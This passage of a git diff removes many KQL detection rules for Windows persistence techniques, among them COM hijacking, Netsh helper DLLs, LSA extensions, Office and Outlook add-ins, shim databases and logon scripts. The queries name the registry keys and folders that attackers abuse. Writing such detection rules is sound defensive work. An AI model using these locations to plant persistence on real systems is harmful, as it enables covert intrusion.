-| where RegistryKey contains "\\Software\\Microsoft\\HtmlHelp Author\\Location" or RegistryKey contains "\\Software\\WOW6432Node\\Microsoft\\HtmlHelp Author\\Location"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_COM_Hijacking_From_Suspicious_Locations.kql b/Persistence/Potential_Persistence_Via_COM_Hijacking_From_Suspicious_Locations.kql
deleted file mode 100644
index b6360528..00000000
--- a/Persistence/Potential_Persistence_Via_COM_Hijacking_From_Suspicious_Locations.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/28
-// Level: high
-// Description: Detects potential COM object hijacking where the "Server" (In/Out) is pointing to a suspicious or unsuale location
-// Tags: attack.persistence, attack.t1546.015
-DeviceRegistryEvents
-| where (RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\Desktop\\" or RegistryValueData contains "\\Downloads\\" or RegistryValueData contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or RegistryValueData contains "\\System32\\spool\\drivers\\color\\" or RegistryValueData contains "\\Users\\Public\\" or RegistryValueData contains "\\Windows\\Temp\\" or RegistryValueData contains "%appdata%" or RegistryValueData contains "%temp%" or RegistryValueData contains "%tmp%") and RegistryKey contains "\\CLSID" and (RegistryKey endswith "\\InprocServer32\\(Default)" or RegistryKey endswith "\\LocalServer32\\(Default)")
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_COM_Search_Order_Hijacking.kql b/Persistence/Potential_Persistence_Via_COM_Search_Order_Hijacking.kql
deleted file mode 100644
index b9526492..00000000
--- a/Persistence/Potential_Persistence_Via_COM_Search_Order_Hijacking.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien
-// Date: 2020/04/14
-// Level: medium
-// Description: Detects potential COM object hijacking leveraging the COM Search Order
-// Tags: attack.persistence, attack.t1546.015
-DeviceRegistryEvents
-| where (RegistryKey contains "\\CLSID" and RegistryKey endswith "\\InprocServer32\\(Default)") and (not(((RegistryValueData endswith ":\\Windows\\system32\\dnssdX.dll" or RegistryValueData endswith ":\\Windows\\SysWOW64\\dnssdX.dll") or ((InitiatingProcessFolderPath contains ":\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Windows Defender\\") and InitiatingProcessFolderPath endswith "\\MsMpEng.exe") or (RegistryValueData contains "\\AppData\\Roaming\\Dropbox\\" and (RegistryValueData contains "\\DropboxExt64." and RegistryValueData contains ".dll")) or InitiatingProcessFolderPath endswith ":\\WINDOWS\\SYSTEM32\\dxdiag.exe" or InitiatingProcessFolderPath endswith "\\MicrosoftEdgeUpdateComRegisterShell64.exe" or RegistryValueData contains ":\\WINDOWS\\system32\\GamingServicesProxy.dll" or (RegistryValueData contains "%%systemroot%%\\system32\\" or RegistryValueData contains "%%systemroot%%\\SysWow64\\") or InitiatingProcessFolderPath endswith ":\\WINDOWS\\system32\\SecurityHealthService.exe" or ((InitiatingProcessFolderPath endswith ":\\Windows\\System32\\poqexec.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\regsvr32.exe") and RegistryKey endswith "\\InProcServer32\\(Default)") or RegistryValueData contains "\\FileRepository\\nvmdi.inf" or (RegistryValueData contains "\\AppData\\Local\\Microsoft\\OneDrive\\" or RegistryValueData contains "\\FileCoAuthLib64.dll" or RegistryValueData contains "\\FileSyncShell64.dll" or RegistryValueData contains "\\FileSyncApi64.dll") or (RegistryValueData contains ":\\Windows\\System32\\Autopilot.dll" and InitiatingProcessFolderPath endswith ":\\Windows\\System32\\poqexec.exe") or RegistryValueData endswith ":\\Windows\\system32\\spool\\drivers\\x64\\3\\PrintConfig.dll" or RegistryValueData contains ":\\ProgramData\\Microsoft\\" or (RegistryValueData contains ":\\Program Files\\" or RegistryValueData contains ":\\Program Files (x86)\\") or (RegistryValueData endswith ":\\Windows\\pyshellext.amd64.dll" or RegistryValueData endswith ":\\Windows\\pyshellext.dll") or (RegistryValueData contains ":\\Windows\\System32\\SecurityHealth" and InitiatingProcessFolderPath endswith ":\\Windows\\system32\\SecurityHealthService.exe") or (RegistryValueData contains "\\AppData\\Local\\Microsoft\\TeamsMeetingAddin\\" and RegistryValueData contains "\\Microsoft.Teams.AddinLoader.dll") or RegistryValueData endswith "TmopIEPlg.dll" or (InitiatingProcessFolderPath endswith ":\\WINDOWS\\system32\\wuauclt.exe" or InitiatingProcessFolderPath endswith ":\\WINDOWS\\system32\\svchost.exe"))))
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_DLLPathOverride.kql b/Persistence/Potential_Persistence_Via_DLLPathOverride.kql
deleted file mode 100644
index df77155d..00000000
--- a/Persistence/Potential_Persistence_Via_DLLPathOverride.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/21
-// Level: high
-// Description: Detects when an attacker adds a new "DLLPathOverride" value to the "Natural Language" key in order to achieve persistence which will get invoked by "SearchIndexer.exe" process
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where RegistryKey contains "\\SYSTEM\\CurrentControlSet\\Control\\ContentIndex\\Language" and (RegistryKey contains "\\StemmerDLLPathOverride" or RegistryKey contains "\\WBDLLPathOverride" or RegistryKey contains "\\StemmerClass" or RegistryKey contains "\\WBreakerClass")
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Disk_Cleanup_Handler_-_Registry.kql b/Persistence/Potential_Persistence_Via_Disk_Cleanup_Handler_-_Registry.kql
deleted file mode 100644
index 5d4ed302..00000000
--- a/Persistence/Potential_Persistence_Via_Disk_Cleanup_Handler_-_Registry.kql
+++ /dev/null
@@ -1,13 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/21
-// Level: medium
-// Description: Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.
-The disk cleanup manager is part of the operating system. It displays the dialog box […]
-The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.
-Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.
-Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.
-Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.
-
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where (ActionType =~ "RegistryKeyCreated" and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\VolumeCaches") and (not((RegistryKey endswith "\\Active Setup Temp Folders" or RegistryKey endswith "\\BranchCache" or RegistryKey endswith "\\Content Indexer Cleaner" or RegistryKey endswith "\\D3D Shader Cache" or RegistryKey endswith "\\Delivery Optimization Files" or RegistryKey endswith "\\Device Driver Packages" or RegistryKey endswith "\\Diagnostic Data Viewer database files" or RegistryKey endswith "\\Downloaded Program Files" or RegistryKey endswith "\\DownloadsFolder" or RegistryKey endswith "\\Feedback Hub Archive log files" or RegistryKey endswith "\\Internet Cache Files" or RegistryKey endswith "\\Language Pack" or RegistryKey endswith "\\Microsoft Office Temp Files" or RegistryKey endswith "\\Offline Pages Files" or RegistryKey endswith "\\Old ChkDsk Files" or RegistryKey endswith "\\Previous Installations" or RegistryKey endswith "\\Recycle Bin" or RegistryKey endswith "\\RetailDemo Offline Content" or RegistryKey endswith "\\Setup Log Files" or RegistryKey endswith "\\System error memory dump files" or RegistryKey endswith "\\System error minidump files" or RegistryKey endswith "\\Temporary Files" or RegistryKey endswith "\\Temporary Setup Files" or RegistryKey endswith "\\Temporary Sync Files" or RegistryKey endswith "\\Thumbnail Cache" or RegistryKey endswith "\\Update Cleanup" or RegistryKey endswith "\\Upgrade Discarded Files" or RegistryKey endswith "\\User file versions" or RegistryKey endswith "\\Windows Defender" or RegistryKey endswith "\\Windows Error Reporting Files" or RegistryKey endswith "\\Windows ESD installation files" or RegistryKey endswith "\\Windows Upgrade Log Files")))
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Event_Viewer_Events.asp.kql b/Persistence/Potential_Persistence_Via_Event_Viewer_Events.asp.kql
deleted file mode 100644
index 617d3ee9..00000000
--- a/Persistence/Potential_Persistence_Via_Event_Viewer_Events.asp.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/17
-// Level: medium
-// Description: Detects potential registry persistence technique using the Event Viewer "Events.asp" technique
-// Tags: attack.persistence, attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgram" or RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionURL") and (not((RegistryValueData =~ "(Empty)" or (RegistryValueData =~ "%%SystemRoot%%\\PCHealth\\HelpCtr\\Binaries\\HelpCtr.exe" and InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\svchost.exe" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgram") or (RegistryValueData =~ "-url hcp://services/centers/support*topic=%%s" and InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\svchost.exe" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgramCommandLineParameters") or RegistryValueData =~ "http://go.microsoft.com/fwlink/events.asp")))
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Excel_Add-in_-_Registry.kql b/Persistence/Potential_Persistence_Via_Excel_Add-in_-_Registry.kql
deleted file mode 100644
index 4548866a..00000000
--- a/Persistence/Potential_Persistence_Via_Excel_Add-in_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2023/01/15
-// Level: high
-// Description: Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.
-// Tags: attack.persistence, attack.t1137.006
-DeviceRegistryEvents
-| where RegistryValueData endswith ".xll" and RegistryValueData startswith "/R " and RegistryKey contains "Software\\Microsoft\\Office" and RegistryKey endswith "\\Excel\\Options"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_GlobalFlags.kql b/Persistence/Potential_Persistence_Via_GlobalFlags.kql
deleted file mode 100644
index 0af11ee9..00000000
--- a/Persistence/Potential_Persistence_Via_GlobalFlags.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Karneades, Jonhnathan Ribeiro, Florian Roth
-// Date: 2018/04/11
-// Level: high
-// Description: Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys
-// Tags: attack.privilege_escalation, attack.persistence, attack.defense_evasion, attack.t1546.012, car.2013-01-002
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion" and RegistryKey contains "\\Image File Execution Options" and RegistryKey contains "\\GlobalFlag") or ((RegistryKey contains "\\ReportingMode" or RegistryKey contains "\\MonitorProcess") and (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion" and RegistryKey contains "\\SilentProcessExit"))
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_LSA_Extensions.kql b/Persistence/Potential_Persistence_Via_LSA_Extensions.kql
deleted file mode 100644
index 8aa8287b..00000000
--- a/Persistence/Potential_Persistence_Via_LSA_Extensions.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/21
-// Level: high
-// Description: Detects when an attacker modifies the "REG_MULTI_SZ" value named "Extensions" to include a custom DLL to achieve persistence via lsass.
-The "Extensions" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.
-
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where RegistryKey contains "\\SYSTEM\\CurrentControlSet\\Control\\LsaExtensionConfig\\LsaSrv\\Extensions"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Logon_Scripts_-_CommandLine.kql b/Persistence/Potential_Persistence_Via_Logon_Scripts_-_CommandLine.kql
deleted file mode 100644
index b8e4b63b..00000000
--- a/Persistence/Potential_Persistence_Via_Logon_Scripts_-_CommandLine.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tom Ueltschi (@c_APT_ure)
-// Date: 2019/01/12
-// Level: high
-// Description: Detects the addition of a new LogonScript to the registry value "UserInitMprLogonScript" for potential persistence
-// Tags: attack.persistence, attack.t1037.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "UserInitMprLogonScript"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Logon_Scripts_-_Registry.kql b/Persistence/Potential_Persistence_Via_Logon_Scripts_-_Registry.kql
deleted file mode 100644
index ff92bcaa..00000000
--- a/Persistence/Potential_Persistence_Via_Logon_Scripts_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tom Ueltschi (@c_APT_ure)
-// Date: 2019/01/12
-// Level: medium
-// Description: Detects creation of "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors
-// Tags: attack.t1037.001, attack.persistence, attack.lateral_movement
-DeviceRegistryEvents
-| where ActionType =~ "RegistryKeyCreated" and RegistryKey contains "UserInitMprLogonScript"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Microsoft_Compatibility_Appraiser.kql b/Persistence/Potential_Persistence_Via_Microsoft_Compatibility_Appraiser.kql
deleted file mode 100644
index da19a9b2..00000000
--- a/Persistence/Potential_Persistence_Via_Microsoft_Compatibility_Appraiser.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Sreeman
-// Date: 2020/09/29
-// Level: medium
-// Description: Detects manual execution of the "Microsoft Compatibility Appraiser" task via schtasks.
-In order to trigger persistence stored in the "\AppCompatFlags\TelemetryController" registry key.
-
-// Tags: attack.persistence, attack.t1053.005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "run " and ProcessCommandLine contains "\\Application Experience\\Microsoft Compatibility Appraiser") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Microsoft_Office_Add-In.kql b/Persistence/Potential_Persistence_Via_Microsoft_Office_Add-In.kql
deleted file mode 100644
index c04b65b2..00000000
--- a/Persistence/Potential_Persistence_Via_Microsoft_Office_Add-In.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: NVISO
-// Date: 2020/05/11
-// Level: high
-// Description: Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).
-// Tags: attack.persistence, attack.t1137.006
-DeviceFileEvents
-| where (FolderPath contains "\\Microsoft\\Addins\\" and (FolderPath endswith ".xlam" or FolderPath endswith ".xla" or FolderPath endswith ".ppam")) or (FolderPath contains "\\Microsoft\\Word\\Startup\\" and FolderPath endswith ".wll") or (FolderPath contains "Microsoft\\Excel\\XLSTART\\" and FolderPath endswith ".xlam") or (FolderPath contains "\\Microsoft\\Excel\\Startup\\" and FolderPath endswith ".xll")
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Microsoft_Office_Startup_Folder.kql b/Persistence/Potential_Persistence_Via_Microsoft_Office_Startup_Folder.kql
deleted file mode 100644
index 8cd7e149..00000000
--- a/Persistence/Potential_Persistence_Via_Microsoft_Office_Startup_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Max Altgelt (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/02
-// Level: high
-// Description: Detects creation of Microsoft Office files inside of one of the default startup folders in order to achieve persistence.
-// Tags: attack.persistence, attack.t1137
-DeviceFileEvents
-| where (((FolderPath endswith ".doc" or FolderPath endswith ".docm" or FolderPath endswith ".docx" or FolderPath endswith ".dot" or FolderPath endswith ".dotm" or FolderPath endswith ".rtf") and (FolderPath contains "\\Microsoft\\Word\\STARTUP" or (FolderPath contains "\\Office" and FolderPath contains "\\Program Files" and FolderPath contains "\\STARTUP"))) or ((FolderPath endswith ".xls" or FolderPath endswith ".xlsm" or FolderPath endswith ".xlsx" or FolderPath endswith ".xlt" or FolderPath endswith ".xltm") and (FolderPath contains "\\Microsoft\\Excel\\XLSTART" or (FolderPath contains "\\Office" and FolderPath contains "\\Program Files" and FolderPath contains "\\XLSTART")))) and (not((InitiatingProcessFolderPath endswith "\\WINWORD.exe" or InitiatingProcessFolderPath endswith "\\EXCEL.exe")))
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Mpnotify.kql b/Persistence/Potential_Persistence_Via_Mpnotify.kql
deleted file mode 100644
index aa6f3b3c..00000000
--- a/Persistence/Potential_Persistence_Via_Mpnotify.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/21
-// Level: high
-// Description: Detects when an attacker register a new SIP provider for persistence and defense evasion
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\mpnotify"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_MyComputer_Registry_Keys.kql b/Persistence/Potential_Persistence_Via_MyComputer_Registry_Keys.kql
deleted file mode 100644
index 2439e7ac..00000000
--- a/Persistence/Potential_Persistence_Via_MyComputer_Registry_Keys.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/09
-// Level: high
-// Description: Detects modification to the "Default" value of the "MyComputer" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer" and RegistryKey endswith "(Default)"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Netsh_Helper_DLL.kql b/Persistence/Potential_Persistence_Via_Netsh_Helper_DLL.kql
deleted file mode 100644
index 5512073b..00000000
--- a/Persistence/Potential_Persistence_Via_Netsh_Helper_DLL.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Victor Sergeev, oscd.community
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects the execution of netsh with "add helper" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.
-
-// Tags: attack.privilege_escalation, attack.persistence, attack.t1546.007, attack.s0108
-DeviceProcessEvents
-| where (ProcessCommandLine contains "add" and ProcessCommandLine contains "helper") and (ProcessVersionInfoOriginalFileName =~ "netsh.exe" or FolderPath endswith "\\netsh.exe")
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Netsh_Helper_DLL_-_Registry.kql b/Persistence/Potential_Persistence_Via_Netsh_Helper_DLL_-_Registry.kql
deleted file mode 100644
index 95c6d258..00000000
--- a/Persistence/Potential_Persistence_Via_Netsh_Helper_DLL_-_Registry.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Anish Bogati
-// Date: 2023/11/28
-// Level: medium
-// Description: Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper
-
-// Tags: attack.persistence, attack.t1546.007
-DeviceRegistryEvents
-| where RegistryValueData contains ".dll" and RegistryKey contains "\\SOFTWARE\\Microsoft\\NetSh"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_New_AMSI_Providers_-_Registry.kql b/Persistence/Potential_Persistence_Via_New_AMSI_Providers_-_Registry.kql
deleted file mode 100644
index 7f67469f..00000000
--- a/Persistence/Potential_Persistence_Via_New_AMSI_Providers_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/21
-// Level: high
-// Description: Detects when an attacker registers a new AMSI provider in order to achieve persistence
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where (ActionType =~ "RegistryKeyCreated" and (RegistryKey contains "\\SOFTWARE\\Microsoft\\AMSI\\Providers" or RegistryKey contains "\\SOFTWARE\\WOW6432Node\\Microsoft\\AMSI\\Providers")) and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\")))
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Notepad++_Plugins.kql b/Persistence/Potential_Persistence_Via_Notepad++_Plugins.kql
deleted file mode 100644
index af2c5ac8..00000000
--- a/Persistence/Potential_Persistence_Via_Notepad++_Plugins.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/10
-// Level: medium
-// Description: Detects creation of new ".dll" files inside the plugins directory of a notepad++ installation by a process other than "gup.exe". Which could indicates possible persistence
-// Tags: attack.persistence
-DeviceFileEvents
-| where (FolderPath contains "\\Notepad++\\plugins\\" and FolderPath endswith ".dll") and (not((InitiatingProcessFolderPath endswith "\\Notepad++\\updater\\gup.exe" or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and (InitiatingProcessFolderPath endswith "\\target.exe" or InitiatingProcessFolderPath endswith "Installer.x64.exe") and InitiatingProcessFolderPath startswith "C:\\Users\\"))))
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Outlook_Form.kql b/Persistence/Potential_Persistence_Via_Outlook_Form.kql
deleted file mode 100644
index 05b0a258..00000000
--- a/Persistence/Potential_Persistence_Via_Outlook_Form.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tobias Michalski (Nextron Systems)
-// Date: 2021/06/10
-// Level: high
-// Description: Detects the creation of a new Outlook form which can contain malicious code
-// Tags: attack.persistence, attack.t1137.003
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\outlook.exe" and (FolderPath contains "\\AppData\\Local\\Microsoft\\FORMS\\IPM" or FolderPath contains "\\Local Settings\\Application Data\\Microsoft\\Forms")
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Outlook_Home_Page.kql b/Persistence/Potential_Persistence_Via_Outlook_Home_Page.kql
deleted file mode 100644
index 286ac042..00000000
--- a/Persistence/Potential_Persistence_Via_Outlook_Home_Page.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tobias Michalski (Nextron Systems)
-// Date: 2021/06/09
-// Level: high
-// Description: Detects potential persistence activity via outlook home pages.
-// Tags: attack.persistence, attack.t1112
-DeviceRegistryEvents
-| where ((RegistryKey contains "\\Software\\Microsoft\\Office" or RegistryKey contains "\\Outlook\\WebView") and RegistryKey endswith "\\URL") and (RegistryKey contains "\\Calendar" or RegistryKey contains "\\Inbox")
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Outlook_LoadMacroProviderOnBoot_Setting.kql b/Persistence/Potential_Persistence_Via_Outlook_LoadMacroProviderOnBoot_Setting.kql
deleted file mode 100644
index 8bbd5aeb..00000000
--- a/Persistence/Potential_Persistence_Via_Outlook_LoadMacroProviderOnBoot_Setting.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/04/05
-// Level: high
-// Description: Detects the modification of Outlook setting "LoadMacroProviderOnBoot" which if enabled allows the automatic loading of any configured VBA project/module
-// Tags: attack.persistence, attack.command_and_control, attack.t1137, attack.t1008, attack.t1546
-DeviceRegistryEvents
-| where RegistryValueData contains "0x00000001" and RegistryKey endswith "\\Outlook\\LoadMacroProviderOnBoot"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Outlook_Today_Pages.kql b/Persistence/Potential_Persistence_Via_Outlook_Today_Pages.kql
deleted file mode 100644
index 55524640..00000000
--- a/Persistence/Potential_Persistence_Via_Outlook_Today_Pages.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tobias Michalski (Nextron Systems)
-// Date: 2021/06/10
-// Level: high
-// Description: Detects potential persistence activity via outlook today pages. An attacker can set a custom page to execute arbitrary code and link to it via the registry key "UserDefinedUrl".
-// Tags: attack.persistence, attack.t1112
-DeviceRegistryEvents
-| where (RegistryKey contains "Software\\Microsoft\\Office" and RegistryKey contains "\\Outlook\\Today") and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "Stamp") or RegistryKey endswith "UserDefinedUrl") and (not((InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\"))))
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Powershell_Search_Order_Hijacking_-_Task.kql b/Persistence/Potential_Persistence_Via_Powershell_Search_Order_Hijacking_-_Task.kql
deleted file mode 100644
index 7010220a..00000000
--- a/Persistence/Potential_Persistence_Via_Powershell_Search_Order_Hijacking_-_Task.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems), Florian Roth (Nextron Systems)
-// Date: 2022/04/08
-// Level: high
-// Description: Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell "Get-Variable" technique as seen being used in Colibri Loader
-// Tags: attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine endswith " -windowstyle hidden" or ProcessCommandLine endswith " -w hidden" or ProcessCommandLine endswith " -ep bypass" or ProcessCommandLine endswith " -noni") and (InitiatingProcessCommandLine contains "-k netsvcs" and InitiatingProcessCommandLine contains "-s Schedule") and InitiatingProcessFolderPath =~ "C:\\WINDOWS\\System32\\svchost.exe"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Scrobj.dll_COM_Hijacking.kql b/Persistence/Potential_Persistence_Via_Scrobj.dll_COM_Hijacking.kql
deleted file mode 100644
index 40b586b7..00000000
--- a/Persistence/Potential_Persistence_Via_Scrobj.dll_COM_Hijacking.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/20
-// Level: medium
-// Description: Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute
-// Tags: attack.persistence, attack.t1546.015
-DeviceRegistryEvents
-| where RegistryValueData =~ "C:\\WINDOWS\\system32\\scrobj.dll" and RegistryKey endswith "InprocServer32\\(Default)"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Shim_Database_In_Uncommon_Location.kql b/Persistence/Potential_Persistence_Via_Shim_Database_In_Uncommon_Location.kql
deleted file mode 100644
index 0e1cdf91..00000000
--- a/Persistence/Potential_Persistence_Via_Shim_Database_In_Uncommon_Location.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/01
-// Level: high
-// Description: Detects the installation of a new shim database where the file is located in a non-default location
-// Tags: attack.persistence, attack.t1546.011
-DeviceRegistryEvents
-| where (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB" and RegistryKey contains "\\DatabasePath") and (not(RegistryValueData contains ":\\Windows\\AppPatch\\Custom"))
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Shim_Database_Modification.kql b/Persistence/Potential_Persistence_Via_Shim_Database_Modification.kql
deleted file mode 100644
index be805d00..00000000
--- a/Persistence/Potential_Persistence_Via_Shim_Database_Modification.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2021/12/30
-// Level: medium
-// Description: Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.
-The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time
-
-// Tags: attack.persistence, attack.t1546.011
-DeviceRegistryEvents
-| where (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom") and (not(RegistryValueData =~ ""))
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_TypedPaths.kql b/Persistence/Potential_Persistence_Via_TypedPaths.kql
deleted file mode 100644
index dab4531e..00000000
--- a/Persistence/Potential_Persistence_Via_TypedPaths.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/22
-// Level: high
-// Description: Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths" and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\SysWOW64\\explorer.exe"))))
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql b/Persistence/Potential_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql
deleted file mode 100644
index 96f4cd8e..00000000
--- a/Persistence/Potential_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql
+++ /dev/null
@@ -1,7 +0,0 @@
